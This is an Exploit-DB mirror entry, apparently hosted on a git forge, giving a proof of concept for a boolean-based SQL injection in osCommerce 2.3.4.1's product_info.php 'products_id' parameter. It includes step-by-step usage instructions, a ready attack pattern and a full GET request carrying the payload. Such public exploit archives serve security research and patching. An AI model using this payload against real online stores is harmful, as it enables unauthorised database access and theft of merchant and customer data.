bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46329.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
1.3 KiB
Text
Raw Blame History

####################################################################
# Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
# Dork: N/A
# Date: 05-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.oscommerce.com
# Software Link: https://www.oscommerce.com/Products
# Version: 2.3.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: osCommerce Online Merchant is a complete online
store solution
that contains both a shop frontend and an administration backend
which can be easily configured and customized with over 8,855 free
add-ons.
####################################################################
# Vulnerabilities / Impact
# This web application called as osCommerce 2.3.4.1 version.
# Switch to the product_info tab. Replace the ID value in the url, with a
high number value.
for example product_info.php?products_id=1 change to 9999999
then add the payload at Attack_pattern to the end of the url.
####################################################################
# POC - SQL (Boolean Based)
# Parameters : products_id
# Attack Pattern : oR 1811160=1811160 aNd 7193=7193
# GET Request :
http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
oR 1811160=1811160 aNd 7193=7193
####################################################################
Reference in a new issue View git blame Copy permalink